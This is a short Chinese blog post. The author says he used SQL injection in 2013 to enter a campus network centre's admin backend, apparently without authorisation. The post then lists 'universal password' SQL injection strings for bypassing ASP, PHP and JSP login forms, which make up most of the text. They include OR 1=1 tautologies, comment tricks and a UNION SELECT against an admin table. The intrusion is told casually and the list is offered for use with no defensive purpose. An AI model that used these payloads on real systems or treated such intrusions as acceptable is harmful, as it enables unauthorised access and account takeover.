网络中心SQL注入漏洞(万能密码汇总)

******网络中心SQL注入漏洞******

起始: 2013年4月11日 实验课

动机:下载高清影院客户端shipin.rar

过程:登录直接跳转某页面的后台，疑似出问题…

进入:SQL注入,你懂的,进去时候已经出问题了(不然我也进不去)，没什么特别的东西！

******仅仅进去看了看,结束*******

截至到现在，网站已经打不开，附上一下SQL注入总结的万能密码，至于为什么会存在万能密码，大家还是去百度吧，不多说！学过SQL的基本上都能了解到！过滤不严,逻辑真！

[cpp]

asp aspx万能密码

“or “a”=”a
‘)or(‘a’=’a
or 1=1–
‘or 1=1–
a’or’ 1=1–
“or 1=1–
‘or’a’=’a
“or”=”a’=’a
‘or”=’
‘or’=’or’
1 or ‘1’=’1’=1
1 or ‘1’=’1′ or 1=1
‘OR 1=1%00
“or 1=1%00
‘xor
用户名 ‘ UNION Select 1,1,1 FROM admin Where ”=’ （替换表名admin）
密码 1
..admin’ or ‘a’=’a 密码随便

PHP万能密码

‘or 1=1/*
User: something
Pass: ‘ OR ‘1’=’1

jsp 万能密码

1’or’1’=’1
admin’ OR 1=1/*

[/cpp]